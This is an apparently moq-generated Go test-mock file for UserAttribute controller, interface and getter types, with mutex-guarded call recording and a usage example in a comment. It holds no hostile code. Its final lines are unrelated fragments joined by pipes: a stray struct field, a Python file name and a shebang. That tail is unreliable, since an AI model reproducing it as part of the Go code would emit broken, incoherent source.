lockUserAttributeControllerMockEnqueue.RUnlock()
return calls
}
// Generic calls GenericFunc.
func (mock *UserAttributeControllerMock) Generic() controller.GenericController {
if mock.GenericFunc == nil {
panic("UserAttributeControllerMock.GenericFunc: method is nil but UserAttributeController.Generic was just called")
}
callInfo := struct {
}{}
lockUserAttributeControllerMockGeneric.Lock()
mock.calls.Generic = append(mock.calls.Generic, callInfo)
lockUserAttributeControllerMockGeneric.Unlock()
return mock.GenericFunc()
}
// GenericCalls gets all the calls that were made to Generic.
// Check the length with:
// len(mockedUserAttributeController.GenericCalls())
func (mock *UserAttributeControllerMock) GenericCalls() []struct {
} {
var calls []struct {
}
lockUserAttributeControllerMockGeneric.RLock()
calls = mock.calls.Generic
lockUserAttributeControllerMockGeneric.RUnlock()
return calls
}
// Informer calls InformerFunc.
func (mock *UserAttributeControllerMock) Informer() cache.SharedIndexInformer {
if mock.InformerFunc == nil {
panic("UserAttributeControllerMock.InformerFunc: method is nil but UserAttributeController.Informer was just called")
}
callInfo := struct {
}{}
lockUserAttributeControllerMockInformer.Lock()
mock.calls.Informer = append(mock.calls.Informer, callInfo)
lockUserAttributeControllerMockInformer.Unlock()
return mock.InformerFunc()
}
// InformerCalls gets all the calls that were made to Informer.
// Check the length with:
// len(mockedUserAttributeController.InformerCalls())
func (mock *UserAttributeControllerMock) InformerCalls() []struct {
} {
var calls []struct {
}
lockUserAttributeControllerMockInformer.RLock()
calls = mock.calls.Informer
lockUserAttributeControllerMockInformer.RUnlock()
return calls
}
// Lister calls ListerFunc.
func (mock *UserAttributeControllerMock) Lister() v3.UserAttributeLister {
if mock.ListerFunc == nil {
panic("UserAttributeControllerMock.ListerFunc: method is nil but UserAttributeController.Lister was just called")
}
callInfo := struct {
}{}
lockUserAttributeControllerMockLister.Lock()
mock.calls.Lister = append(mock.calls.Lister, callInfo)
lockUserAttributeControllerMockLister.Unlock()
return mock.ListerFunc()
}
// ListerCalls gets all the calls that were made to Lister.
// Check the length with:
// len(mockedUserAttributeController.ListerCalls())
func (mock *UserAttributeControllerMock) ListerCalls() []struct {
} {
var calls []struct {
}
lockUserAttributeControllerMockLister.RLock()
calls = mock.calls.Lister
lockUserAttributeControllerMockLister.RUnlock()
return calls
}
// Start calls StartFunc.
func (mock *UserAttributeControllerMock) Start(ctx context.Context, threadiness int) error {
if mock.StartFunc == nil {
panic("UserAttributeControllerMock.StartFunc: method is nil but UserAttributeController.Start was just called")
}
callInfo := struct {
Ctx context.Context
Threadiness int
}{
Ctx: ctx,
Threadiness: threadiness,
}
lockUserAttributeControllerMockStart.Lock()
mock.calls.Start = append(mock.calls.Start, callInfo)
lockUserAttributeControllerMockStart.Unlock()
return mock.StartFunc(ctx, threadiness)
}
// StartCalls gets all the calls that were made to Start.
// Check the length with:
// len(mockedUserAttributeController.StartCalls())
func (mock *UserAttributeControllerMock) StartCalls() []struct {
Ctx context.Context
Threadiness int
} {
var calls []struct {
Ctx context.Context
Threadiness int
}
lockUserAttributeControllerMockStart.RLock()
calls = mock.calls.Start
lockUserAttributeControllerMockStart.RUnlock()
return calls
}
// Sync calls SyncFunc.
func (mock *UserAttributeControllerMock) Sync(ctx context.Context) error {
if mock.SyncFunc == nil {
panic("UserAttributeControllerMock.SyncFunc: method is nil but UserAttributeController.Sync was just called")
}
callInfo := struct {
Ctx context.Context
}{
Ctx: ctx,
}
lockUserAttributeControllerMockSync.Lock()
mock.calls.Sync = append(mock.calls.Sync, callInfo)
lockUserAttributeControllerMockSync.Unlock()
return mock.SyncFunc(ctx)
}
// SyncCalls gets all the calls that were made to Sync.
// Check the length with:
// len(mockedUserAttributeController.SyncCalls())
func (mock *UserAttributeControllerMock) SyncCalls() []struct {
Ctx context.Context
} {
var calls []struct {
Ctx context.Context
}
lockUserAttributeControllerMockSync.RLock()
calls = mock.calls.Sync
lockUserAttributeControllerMockSync.RUnlock()
return calls
}
var (
lockUserAttributeInterfaceMockAddClusterScopedHandler sync.RWMutex
lockUserAttributeInterfaceMockAddClusterScopedLifecycle sync.RWMutex
lockUserAttributeInterfaceMockAddHandler sync.RWMutex
lockUserAttributeInterfaceMockAddLifecycle sync.RWMutex
lockUserAttributeInterfaceMockController sync.RWMutex
lockUserAttributeInterfaceMockCreate sync.RWMutex
lockUserAttributeInterfaceMockDelete sync.RWMutex
lockUserAttributeInterfaceMockDeleteCollection sync.RWMutex
lockUserAttributeInterfaceMockDeleteNamespaced sync.RWMutex
lockUserAttributeInterfaceMockGet sync.RWMutex
lockUserAttributeInterfaceMockGetNamespaced sync.RWMutex
lockUserAttributeInterfaceMockList sync.RWMutex
lockUserAttributeInterfaceMockObjectClient sync.RWMutex
lockUserAttributeInterfaceMockUpdate sync.RWMutex
lockUserAttributeInterfaceMockWatch sync.RWMutex
)
// Ensure, that UserAttributeInterfaceMock does implement UserAttributeInterface.
// If this is not the case, regenerate this file with moq.
var _ v3.UserAttributeInterface = &UserAttributeInterfaceMock{}
// UserAttributeInterfaceMock is a mock implementation of UserAttributeInterface.
//
// func TestSomethingThatUsesUserAttributeInterface(t *testing.T) {
//
// // make and configure a mocked UserAttributeInterface
// mockedUserAttributeInterface := &UserAttributeInterfaceMock{
// AddClusterScopedHandlerFunc: func(ctx context.Context, name string, clusterName string, sync v3.UserAttributeHandlerFunc) {
// panic("mock out the AddClusterScopedHandler method")
// },
// AddClusterScopedLifecycleFunc: func(ctx context.Context, name string, clusterName string, lifecycle v3.UserAttributeLifecycle) {
// panic("mock out the AddClusterScopedLifecycle method")
// },
// AddHandlerFunc: func(ctx context.Context, name string, sync v3.UserAttributeHandlerFunc) {
// panic("mock out the AddHandler method")
// },
// AddLifecycleFunc: func(ctx context.Context, name string, lifecycle v3.UserAttributeLifecycle) {
// panic("mock out the AddLifecycle method")
// },
// ControllerFunc: func() v3.UserAttributeController {
// panic("mock out the Controller method")
// },
// CreateFunc: func(in1 *v3.UserAttribute) (*v3.UserAttribute, error) {
// panic("mock out the Create method")
// },
// DeleteFunc: func(name string, options *v1.DeleteOptions) error {
// panic("mock out the Delete method")
// },
// DeleteCollectionFunc: func(deleteOpts *v1.DeleteOptions, listOpts v1.ListOptions) error {
// panic("mock out the DeleteCollection method")
// },
// DeleteNamespacedFunc: func(namespace string, name string, options *v1.DeleteOptions) error {
// panic("mock out the DeleteNamespaced method")
// },
// GetFunc: func(name string, opts v1.GetOptions) (*v3.UserAttribute, error) {
// panic("mock out the Get method")
// },
// GetNamespacedFunc: func(namespace string, name string, opts v1.GetOptions) (*v3.UserAttribute, error) {
// panic("mock out the GetNamespaced method")
// },
// ListFunc: func(opts v1.ListOptions) (*v3.UserAttributeList, error) {
// panic("mock out the List method")
// },
// ObjectClientFunc: func() *objectclient.ObjectClient {
// panic("mock out the ObjectClient method")
// },
// UpdateFunc: func(in1 *v3.UserAttribute) (*v3.UserAttribute, error) {
// panic("mock out the Update method")
// },
// WatchFunc: func(opts v1.ListOptions) (watch.Interface, error) {
// panic("mock out the Watch method")
// },
// }
//
// // use mockedUserAttributeInterface in code that requires UserAttributeInterface
// // and then make assertions.
//
// }
type UserAttributeInterfaceMock struct {
// AddClusterScopedHandlerFunc mocks the AddClusterScopedHandler method.
AddClusterScopedHandlerFunc func(ctx context.Context, name string, clusterName string, sync v3.UserAttributeHandlerFunc)
// AddClusterScopedLifecycleFunc mocks the AddClusterScopedLifecycle method.
AddClusterScopedLifecycleFunc func(ctx context.Context, name string, clusterName string, lifecycle v3.UserAttributeLifecycle)
// AddHandlerFunc mocks the AddHandler method.
AddHandlerFunc func(ctx context.Context, name string, sync v3.UserAttributeHandlerFunc)
// AddLifecycleFunc mocks the AddLifecycle method.
AddLifecycleFunc func(ctx context.Context, name string, lifecycle v3.UserAttributeLifecycle)
// ControllerFunc mocks the Controller method.
ControllerFunc func() v3.UserAttributeController
// CreateFunc mocks the Create method.
CreateFunc func(in1 *v3.UserAttribute) (*v3.UserAttribute, error)
// DeleteFunc mocks the Delete method.
DeleteFunc func(name string, options *v1.DeleteOptions) error
// DeleteCollectionFunc mocks the DeleteCollection method.
DeleteCollectionFunc func(deleteOpts *v1.DeleteOptions, listOpts v1.ListOptions) error
// DeleteNamespacedFunc mocks the DeleteNamespaced method.
DeleteNamespacedFunc func(namespace string, name string, options *v1.DeleteOptions) error
// GetFunc mocks the Get method.
GetFunc func(name string, opts v1.GetOptions) (*v3.UserAttribute, error)
// GetNamespacedFunc mocks the GetNamespaced method.
GetNamespacedFunc func(namespace string, name string, opts v1.GetOptions) (*v3.UserAttribute, error)
// ListFunc mocks the List method.
ListFunc func(opts v1.ListOptions) (*v3.UserAttributeList, error)
// ObjectClientFunc mocks the ObjectClient method.
ObjectClientFunc func() *objectclient.ObjectClient
// UpdateFunc mocks the Update method.
UpdateFunc func(in1 *v3.UserAttribute) (*v3.UserAttribute, error)
// WatchFunc mocks the Watch method.
WatchFunc func(opts v1.ListOptions) (watch.Interface, error)
// calls tracks calls to the methods.
calls struct {
// AddClusterScopedHandler holds details about calls to the AddClusterScopedHandler method.
AddClusterScopedHandler []struct {
// Ctx is the ctx argument value.
Ctx context.Context
// Name is the name argument value.
Name string
// ClusterName is the clusterName argument value.
ClusterName string
// Sync is the sync argument value.
Sync v3.UserAttributeHandlerFunc
}
// AddClusterScopedLifecycle holds details about calls to the AddClusterScopedLifecycle method.
AddClusterScopedLifecycle []struct {
// Ctx is the ctx argument value.
Ctx context.Context
// Name is the name argument value.
Name string
// ClusterName is the clusterName argument value.
ClusterName string
// Lifecycle is the lifecycle argument value.
Lifecycle v3.UserAttributeLifecycle
}
// AddHandler holds details about calls to the AddHandler method.
AddHandler []struct {
// Ctx is the ctx argument value.
Ctx context.Context
// Name is the name argument value.
Name string
// Sync is the sync argument value.
Sync v3.UserAttributeHandlerFunc
}
// AddLifecycle holds details about calls to the AddLifecycle method.
AddLifecycle []struct {
// Ctx is the ctx argument value.
Ctx context.Context
// Name is the name argument value.
Name string
// Lifecycle is the lifecycle argument value.
Lifecycle v3.UserAttributeLifecycle
}
// Controller holds details about calls to the Controller method.
Controller []struct {
}
// Create holds details about calls to the Create method.
Create []struct {
// In1 is the in1 argument value.
In1 *v3.UserAttribute
}
// Delete holds details about calls to the Delete method.
Delete []struct {
// Name is the name argument value.
Name string
// Options is the options argument value.
Options *v1.DeleteOptions
}
// DeleteCollection holds details about calls to the DeleteCollection method.
DeleteCollection []struct {
// DeleteOpts is the deleteOpts argument value.
DeleteOpts *v1.DeleteOptions
// ListOpts is the listOpts argument value.
ListOpts v1.ListOptions
}
// DeleteNamespaced holds details about calls to the DeleteNamespaced method.
DeleteNamespaced []struct {
// Namespace is the namespace argument value.
Namespace string
// Name is the name argument value.
Name string
// Options is the options argument value.
Options *v1.DeleteOptions
}
// Get holds details about calls to the Get method.
Get []struct {
// Name is the name argument value.
Name string
// Opts is the opts argument value.
Opts v1.GetOptions
}
// GetNamespaced holds details about calls to the GetNamespaced method.
GetNamespaced []struct {
// Namespace is the namespace argument value.
Namespace string
// Name is the name argument value.
Name string
// Opts is the opts argument value.
Opts v1.GetOptions
}
// List holds details about calls to the List method.
List []struct {
// Opts is the opts argument value.
Opts v1.ListOptions
}
// ObjectClient holds details about calls to the ObjectClient method.
ObjectClient []struct {
}
// Update holds details about calls to the Update method.
Update []struct {
// In1 is the in1 argument value.
In1 *v3.UserAttribute
}
// Watch holds details about calls to the Watch method.
Watch []struct {
// Opts is the opts argument value.
Opts v1.ListOptions
}
}
}
// AddClusterScopedHandler calls AddClusterScopedHandlerFunc.
func (mock *UserAttributeInterfaceMock) AddClusterScopedHandler(ctx context.Context, name string, clusterName string, sync v3.UserAttributeHandlerFunc) {
if mock.AddClusterScopedHandlerFunc == nil {
panic("UserAttributeInterfaceMock.AddClusterScopedHandlerFunc: method is nil but UserAttributeInterface.AddClusterScopedHandler was just called")
}
callInfo := struct {
Ctx context.Context
Name string
ClusterName string
Sync v3.UserAttributeHandlerFunc
}{
Ctx: ctx,
Name: name,
ClusterName: clusterName,
Sync: sync,
}
lockUserAttributeInterfaceMockAddClusterScopedHandler.Lock()
mock.calls.AddClusterScopedHandler = append(mock.calls.AddClusterScopedHandler, callInfo)
lockUserAttributeInterfaceMockAddClusterScopedHandler.Unlock()
mock.AddClusterScopedHandlerFunc(ctx, name, clusterName, sync)
}
// AddClusterScopedHandlerCalls gets all the calls that were made to AddClusterScopedHandler.
// Check the length with:
// len(mockedUserAttributeInterface.AddClusterScopedHandlerCalls())
func (mock *UserAttributeInterfaceMock) AddClusterScopedHandlerCalls() []struct {
Ctx context.Context
Name string
ClusterName string
Sync v3.UserAttributeHandlerFunc
} {
var calls []struct {
Ctx context.Context
Name string
ClusterName string
Sync v3.UserAttributeHandlerFunc
}
lockUserAttributeInterfaceMockAddClusterScopedHandler.RLock()
calls = mock.calls.AddClusterScopedHandler
lockUserAttributeInterfaceMockAddClusterScopedHandler.RUnlock()
return calls
}
// AddClusterScopedLifecycle calls AddClusterScopedLifecycleFunc.
func (mock *UserAttributeInterfaceMock) AddClusterScopedLifecycle(ctx context.Context, name string, clusterName string, lifecycle v3.UserAttributeLifecycle) {
if mock.AddClusterScopedLifecycleFunc == nil {
panic("UserAttributeInterfaceMock.AddClusterScopedLifecycleFunc: method is nil but UserAttributeInterface.AddClusterScopedLifecycle was just called")
}
callInfo := struct {
Ctx context.Context
Name string
ClusterName string
Lifecycle v3.UserAttributeLifecycle
}{
Ctx: ctx,
Name: name,
ClusterName: clusterName,
Lifecycle: lifecycle,
}
lockUserAttributeInterfaceMockAddClusterScopedLifecycle.Lock()
mock.calls.AddClusterScopedLifecycle = append(mock.calls.AddClusterScopedLifecycle, callInfo)
lockUserAttributeInterfaceMockAddClusterScopedLifecycle.Unlock()
mock.AddClusterScopedLifecycleFunc(ctx, name, clusterName, lifecycle)
}
// AddClusterScopedLifecycleCalls gets all the calls that were made to AddClusterScopedLifecycle.
// Check the length with:
// len(mockedUserAttributeInterface.AddClusterScopedLifecycleCalls())
func (mock *UserAttributeInterfaceMock) AddClusterScopedLifecycleCalls() []struct {
Ctx context.Context
Name string
ClusterName string
Lifecycle v3.UserAttributeLifecycle
} {
var calls []struct {
Ctx context.Context
Name string
ClusterName string
Lifecycle v3.UserAttributeLifecycle
}
lockUserAttributeInterfaceMockAddClusterScopedLifecycle.RLock()
calls = mock.calls.AddClusterScopedLifecycle
lockUserAttributeInterfaceMockAddClusterScopedLifecycle.RUnlock()
return calls
}
// AddHandler calls AddHandlerFunc.
func (mock *UserAttributeInterfaceMock) AddHandler(ctx context.Context, name string, sync v3.UserAttributeHandlerFunc) {
if mock.AddHandlerFunc == nil {
panic("UserAttributeInterfaceMock.AddHandlerFunc: method is nil but UserAttributeInterface.AddHandler was just called")
}
callInfo := struct {
Ctx context.Context
Name string
Sync v3.UserAttributeHandlerFunc
}{
Ctx: ctx,
Name: name,
Sync: sync,
}
lockUserAttributeInterfaceMockAddHandler.Lock()
mock.calls.AddHandler = append(mock.calls.AddHandler, callInfo)
lockUserAttributeInterfaceMockAddHandler.Unlock()
mock.AddHandlerFunc(ctx, name, sync)
}
// AddHandlerCalls gets all the calls that were made to AddHandler.
// Check the length with:
// len(mockedUserAttributeInterface.AddHandlerCalls())
func (mock *UserAttributeInterfaceMock) AddHandlerCalls() []struct {
Ctx context.Context
Name string
Sync v3.UserAttributeHandlerFunc
} {
var calls []struct {
Ctx context.Context
Name string
Sync v3.UserAttributeHandlerFunc
}
lockUserAttributeInterfaceMockAddHandler.RLock()
calls = mock.calls.AddHandler
lockUserAttributeInterfaceMockAddHandler.RUnlock()
return calls
}
// AddLifecycle calls AddLifecycleFunc.
func (mock *UserAttributeInterfaceMock) AddLifecycle(ctx context.Context, name string, lifecycle v3.UserAttributeLifecycle) {
if mock.AddLifecycleFunc == nil {
panic("UserAttributeInterfaceMock.AddLifecycleFunc: method is nil but UserAttributeInterface.AddLifecycle was just called")
}
callInfo := struct {
Ctx context.Context
Name string
Lifecycle v3.UserAttributeLifecycle
}{
Ctx: ctx,
Name: name,
Lifecycle: lifecycle,
}
lockUserAttributeInterfaceMockAddLifecycle.Lock()
mock.calls.AddLifecycle = append(mock.calls.AddLifecycle, callInfo)
lockUserAttributeInterfaceMockAddLifecycle.Unlock()
mock.AddLifecycleFunc(ctx, name, lifecycle)
}
// AddLifecycleCalls gets all the calls that were made to AddLifecycle.
// Check the length with:
// len(mockedUserAttributeInterface.AddLifecycleCalls())
func (mock *UserAttributeInterfaceMock) AddLifecycleCalls() []struct {
Ctx context.Context
Name string
Lifecycle v3.UserAttributeLifecycle
} {
var calls []struct {
Ctx context.Context
Name string
Lifecycle v3.UserAttributeLifecycle
}
lockUserAttributeInterfaceMockAddLifecycle.RLock()
calls = mock.calls.AddLifecycle
lockUserAttributeInterfaceMockAddLifecycle.RUnlock()
return calls
}
// Controller calls ControllerFunc.
func (mock *UserAttributeInterfaceMock) Controller() v3.UserAttributeController {
if mock.ControllerFunc == nil {
panic("UserAttributeInterfaceMock.ControllerFunc: method is nil but UserAttributeInterface.Controller was just called")
}
callInfo := struct {
}{}
lockUserAttributeInterfaceMockController.Lock()
mock.calls.Controller = append(mock.calls.Controller, callInfo)
lockUserAttributeInterfaceMockController.Unlock()
return mock.ControllerFunc()
}
// ControllerCalls gets all the calls that were made to Controller.
// Check the length with:
// len(mockedUserAttributeInterface.ControllerCalls())
func (mock *UserAttributeInterfaceMock) ControllerCalls() []struct {
} {
var calls []struct {
}
lockUserAttributeInterfaceMockController.RLock()
calls = mock.calls.Controller
lockUserAttributeInterfaceMockController.RUnlock()
return calls
}
// Create calls CreateFunc.
func (mock *UserAttributeInterfaceMock) Create(in1 *v3.UserAttribute) (*v3.UserAttribute, error) {
if mock.CreateFunc == nil {
panic("UserAttributeInterfaceMock.CreateFunc: method is nil but UserAttributeInterface.Create was just called")
}
callInfo := struct {
In1 *v3.UserAttribute
}{
In1: in1,
}
lockUserAttributeInterfaceMockCreate.Lock()
mock.calls.Create = append(mock.calls.Create, callInfo)
lockUserAttributeInterfaceMockCreate.Unlock()
return mock.CreateFunc(in1)
}
// CreateCalls gets all the calls that were made to Create.
// Check the length with:
// len(mockedUserAttributeInterface.CreateCalls())
func (mock *UserAttributeInterfaceMock) CreateCalls() []struct {
In1 *v3.UserAttribute
} {
var calls []struct {
In1 *v3.UserAttribute
}
lockUserAttributeInterfaceMockCreate.RLock()
calls = mock.calls.Create
lockUserAttributeInterfaceMockCreate.RUnlock()
return calls
}
// Delete calls DeleteFunc.
func (mock *UserAttributeInterfaceMock) Delete(name string, options *v1.DeleteOptions) error {
if mock.DeleteFunc == nil {
panic("UserAttributeInterfaceMock.DeleteFunc: method is nil but UserAttributeInterface.Delete was just called")
}
callInfo := struct {
Name string
Options *v1.DeleteOptions
}{
Name: name,
Options: options,
}
lockUserAttributeInterfaceMockDelete.Lock()
mock.calls.Delete = append(mock.calls.Delete, callInfo)
lockUserAttributeInterfaceMockDelete.Unlock()
return mock.DeleteFunc(name, options)
}
// DeleteCalls gets all the calls that were made to Delete.
// Check the length with:
// len(mockedUserAttributeInterface.DeleteCalls())
func (mock *UserAttributeInterfaceMock) DeleteCalls() []struct {
Name string
Options *v1.DeleteOptions
} {
var calls []struct {
Name string
Options *v1.DeleteOptions
}
lockUserAttributeInterfaceMockDelete.RLock()
calls = mock.calls.Delete
lockUserAttributeInterfaceMockDelete.RUnlock()
return calls
}
// DeleteCollection calls DeleteCollectionFunc.
func (mock *UserAttributeInterfaceMock) DeleteCollection(deleteOpts *v1.DeleteOptions, listOpts v1.ListOptions) error {
if mock.DeleteCollectionFunc == nil {
panic("UserAttributeInterfaceMock.DeleteCollectionFunc: method is nil but UserAttributeInterface.DeleteCollection was just called")
}
callInfo := struct {
DeleteOpts *v1.DeleteOptions
ListOpts v1.ListOptions
}{
DeleteOpts: deleteOpts,
ListOpts: listOpts,
}
lockUserAttributeInterfaceMockDeleteCollection.Lock()
mock.calls.DeleteCollection = append(mock.calls.DeleteCollection, callInfo)
lockUserAttributeInterfaceMockDeleteCollection.Unlock()
return mock.DeleteCollectionFunc(deleteOpts, listOpts)
}
// DeleteCollectionCalls gets all the calls that were made to DeleteCollection.
// Check the length with:
// len(mockedUserAttributeInterface.DeleteCollectionCalls())
func (mock *UserAttributeInterfaceMock) DeleteCollectionCalls() []struct {
DeleteOpts *v1.DeleteOptions
ListOpts v1.ListOptions
} {
var calls []struct {
DeleteOpts *v1.DeleteOptions
ListOpts v1.ListOptions
}
lockUserAttributeInterfaceMockDeleteCollection.RLock()
calls = mock.calls.DeleteCollection
lockUserAttributeInterfaceMockDeleteCollection.RUnlock()
return calls
}
// DeleteNamespaced calls DeleteNamespacedFunc.
func (mock *UserAttributeInterfaceMock) DeleteNamespaced(namespace string, name string, options *v1.DeleteOptions) error {
if mock.DeleteNamespacedFunc == nil {
panic("UserAttributeInterfaceMock.DeleteNamespacedFunc: method is nil but UserAttributeInterface.DeleteNamespaced was just called")
}
callInfo := struct {
Namespace string
Name string
Options *v1.DeleteOptions
}{
Namespace: namespace,
Name: name,
Options: options,
}
lockUserAttributeInterfaceMockDeleteNamespaced.Lock()
mock.calls.DeleteNamespaced = append(mock.calls.DeleteNamespaced, callInfo)
lockUserAttributeInterfaceMockDeleteNamespaced.Unlock()
return mock.DeleteNamespacedFunc(namespace, name, options)
}
// DeleteNamespacedCalls gets all the calls that were made to DeleteNamespaced.
// Check the length with:
// len(mockedUserAttributeInterface.DeleteNamespacedCalls())
func (mock *UserAttributeInterfaceMock) DeleteNamespacedCalls() []struct {
Namespace string
Name string
Options *v1.DeleteOptions
} {
var calls []struct {
Namespace string
Name string
Options *v1.DeleteOptions
}
lockUserAttributeInterfaceMockDeleteNamespaced.RLock()
calls = mock.calls.DeleteNamespaced
lockUserAttributeInterfaceMockDeleteNamespaced.RUnlock()
return calls
}
// Get calls GetFunc.
func (mock *UserAttributeInterfaceMock) Get(name string, opts v1.GetOptions) (*v3.UserAttribute, error) {
if mock.GetFunc == nil {
panic("UserAttributeInterfaceMock.GetFunc: method is nil but UserAttributeInterface.Get was just called")
}
callInfo := struct {
Name string
Opts v1.GetOptions
}{
Name: name,
Opts: opts,
}
lockUserAttributeInterfaceMockGet.Lock()
mock.calls.Get = append(mock.calls.Get, callInfo)
lockUserAttributeInterfaceMockGet.Unlock()
return mock.GetFunc(name, opts)
}
// GetCalls gets all the calls that were made to Get.
// Check the length with:
// len(mockedUserAttributeInterface.GetCalls())
func (mock *UserAttributeInterfaceMock) GetCalls() []struct {
Name string
Opts v1.GetOptions
} {
var calls []struct {
Name string
Opts v1.GetOptions
}
lockUserAttributeInterfaceMockGet.RLock()
calls = mock.calls.Get
lockUserAttributeInterfaceMockGet.RUnlock()
return calls
}
// GetNamespaced calls GetNamespacedFunc.
func (mock *UserAttributeInterfaceMock) GetNamespaced(namespace string, name string, opts v1.GetOptions) (*v3.UserAttribute, error) {
if mock.GetNamespacedFunc == nil {
panic("UserAttributeInterfaceMock.GetNamespacedFunc: method is nil but UserAttributeInterface.GetNamespaced was just called")
}
callInfo := struct {
Namespace string
Name string
Opts v1.GetOptions
}{
Namespace: namespace,
Name: name,
Opts: opts,
}
lockUserAttributeInterfaceMockGetNamespaced.Lock()
mock.calls.GetNamespaced = append(mock.calls.GetNamespaced, callInfo)
lockUserAttributeInterfaceMockGetNamespaced.Unlock()
return mock.GetNamespacedFunc(namespace, name, opts)
}
// GetNamespacedCalls gets all the calls that were made to GetNamespaced.
// Check the length with:
// len(mockedUserAttributeInterface.GetNamespacedCalls())
func (mock *UserAttributeInterfaceMock) GetNamespacedCalls() []struct {
Namespace string
Name string
Opts v1.GetOptions
} {
var calls []struct {
Namespace string
Name string
Opts v1.GetOptions
}
lockUserAttributeInterfaceMockGetNamespaced.RLock()
calls = mock.calls.GetNamespaced
lockUserAttributeInterfaceMockGetNamespaced.RUnlock()
return calls
}
// List calls ListFunc.
func (mock *UserAttributeInterfaceMock) List(opts v1.ListOptions) (*v3.UserAttributeList, error) {
if mock.ListFunc == nil {
panic("UserAttributeInterfaceMock.ListFunc: method is nil but UserAttributeInterface.List was just called")
}
callInfo := struct {
Opts v1.ListOptions
}{
Opts: opts,
}
lockUserAttributeInterfaceMockList.Lock()
mock.calls.List = append(mock.calls.List, callInfo)
lockUserAttributeInterfaceMockList.Unlock()
return mock.ListFunc(opts)
}
// ListCalls gets all the calls that were made to List.
// Check the length with:
// len(mockedUserAttributeInterface.ListCalls())
func (mock *UserAttributeInterfaceMock) ListCalls() []struct {
Opts v1.ListOptions
} {
var calls []struct {
Opts v1.ListOptions
}
lockUserAttributeInterfaceMockList.RLock()
calls = mock.calls.List
lockUserAttributeInterfaceMockList.RUnlock()
return calls
}
// ObjectClient calls ObjectClientFunc.
func (mock *UserAttributeInterfaceMock) ObjectClient() *objectclient.ObjectClient {
if mock.ObjectClientFunc == nil {
panic("UserAttributeInterfaceMock.ObjectClientFunc: method is nil but UserAttributeInterface.ObjectClient was just called")
}
callInfo := struct {
}{}
lockUserAttributeInterfaceMockObjectClient.Lock()
mock.calls.ObjectClient = append(mock.calls.ObjectClient, callInfo)
lockUserAttributeInterfaceMockObjectClient.Unlock()
return mock.ObjectClientFunc()
}
// ObjectClientCalls gets all the calls that were made to ObjectClient.
// Check the length with:
// len(mockedUserAttributeInterface.ObjectClientCalls())
func (mock *UserAttributeInterfaceMock) ObjectClientCalls() []struct {
} {
var calls []struct {
}
lockUserAttributeInterfaceMockObjectClient.RLock()
calls = mock.calls.ObjectClient
lockUserAttributeInterfaceMockObjectClient.RUnlock()
return calls
}
// Update calls UpdateFunc.
func (mock *UserAttributeInterfaceMock) Update(in1 *v3.UserAttribute) (*v3.UserAttribute, error) {
if mock.UpdateFunc == nil {
panic("UserAttributeInterfaceMock.UpdateFunc: method is nil but UserAttributeInterface.Update was just called")
}
callInfo := struct {
In1 *v3.UserAttribute
}{
In1: in1,
}
lockUserAttributeInterfaceMockUpdate.Lock()
mock.calls.Update = append(mock.calls.Update, callInfo)
lockUserAttributeInterfaceMockUpdate.Unlock()
return mock.UpdateFunc(in1)
}
// UpdateCalls gets all the calls that were made to Update.
// Check the length with:
// len(mockedUserAttributeInterface.UpdateCalls())
func (mock *UserAttributeInterfaceMock) UpdateCalls() []struct {
In1 *v3.UserAttribute
} {
var calls []struct {
In1 *v3.UserAttribute
}
lockUserAttributeInterfaceMockUpdate.RLock()
calls = mock.calls.Update
lockUserAttributeInterfaceMockUpdate.RUnlock()
return calls
}
// Watch calls WatchFunc.
func (mock *UserAttributeInterfaceMock) Watch(opts v1.ListOptions) (watch.Interface, error) {
if mock.WatchFunc == nil {
panic("UserAttributeInterfaceMock.WatchFunc: method is nil but UserAttributeInterface.Watch was just called")
}
callInfo := struct {
Opts v1.ListOptions
}{
Opts: opts,
}
lockUserAttributeInterfaceMockWatch.Lock()
mock.calls.Watch = append(mock.calls.Watch, callInfo)
lockUserAttributeInterfaceMockWatch.Unlock()
return mock.WatchFunc(opts)
}
// WatchCalls gets all the calls that were made to Watch.
// Check the length with:
// len(mockedUserAttributeInterface.WatchCalls())
func (mock *UserAttributeInterfaceMock) WatchCalls() []struct {
Opts v1.ListOptions
} {
var calls []struct {
Opts v1.ListOptions
}
lockUserAttributeInterfaceMockWatch.RLock()
calls = mock.calls.Watch
lockUserAttributeInterfaceMockWatch.RUnlock()
return calls
}
var (
lockUserAttributesGetterMockUserAttributes sync.RWMutex
)
// Ensure that UserAttributesGetterMock does implement UserAttributesGetter.
// If this is not the case, regenerate this file with moq.
var _ v3.UserAttributesGetter = &UserAttributesGetterMock{}
// UserAttributesGetterMock is a mock implementation of UserAttributesGetter.
//
// func TestSomethingThatUsesUserAttributesGetter(t *testing.T) {
//
// // make and configure a mocked UserAttributesGetter
// mockedUserAttributesGetter := &UserAttributesGetterMock{
// UserAttributesFunc: func(namespace string) v3.UserAttributeInterface {
// panic("mock out the UserAttributes method")
// },
// }
//
// // use mockedUserAttributesGetter in code that requires UserAttributesGetter
// // and then make assertions.
//
// }
type UserAttributesGetterMock struct {
// UserAttributesFunc mocks the UserAttributes method.
UserAttributesFunc func(namespace string) v3.UserAttributeInterface
// calls tracks calls to the methods.
calls struct {
// UserAttributes holds details about calls to the UserAttributes method.
UserAttributes []struct {
// Namespace is the namespace argument value.
Namespace string
}
}
}
// UserAttributes calls UserAttributesFunc.
func (mock *UserAttributesGetterMock) UserAttributes(namespace string) v3.UserAttributeInterface {
if mock.UserAttributesFunc == nil {
panic("UserAttributesGetterMock.UserAttributesFunc: method is nil but UserAttributesGetter.UserAttributes was just called")
}
callInfo := struct {
Namespace string
}{
Namespace: namespace,
}
lockUserAttributesGetterMockUserAttributes.Lock()
mock.calls.UserAttributes = append(mock.calls.UserAttributes, callInfo)
lockUserAttributesGetterMockUserAttributes.Unlock()
return mock.UserAttributesFunc(namespace)
}
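// Example (editor's sketch, not moq output): a test can drive the mock and
// then assert on the recorded calls; the namespace value is illustrative.
//
//	mocked := &UserAttributesGetterMock{
//		UserAttributesFunc: func(namespace string) v3.UserAttributeInterface { return nil },
//	}
//	mocked.UserAttributes("some-namespace")
//	if len(mocked.UserAttributesCalls()) != 1 {
//		t.Fatal("expected exactly one UserAttributes call")
//	}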
// UserAttributesCalls gets all the calls that were made to UserAttributes.
// Check the length with:
// len(mockedUserAttributesGetter.UserAttributesCalls())
func (mock *UserAttributesGetterMock) UserAttributesCalls() []struct {
Namespace string
} {
var calls []struct {
Namespace string
}
lockUserAttributesGetterMockUserAttributes.RLock()
calls = mock.calls.UserAttributes
lockUserAttributesGetterMockUserAttributes.RUnlock()
return calls
} | // Selector is the selector argument value.
Selector labels.Selector
} |
rpcuser.py | #!/usr/bin/env python2
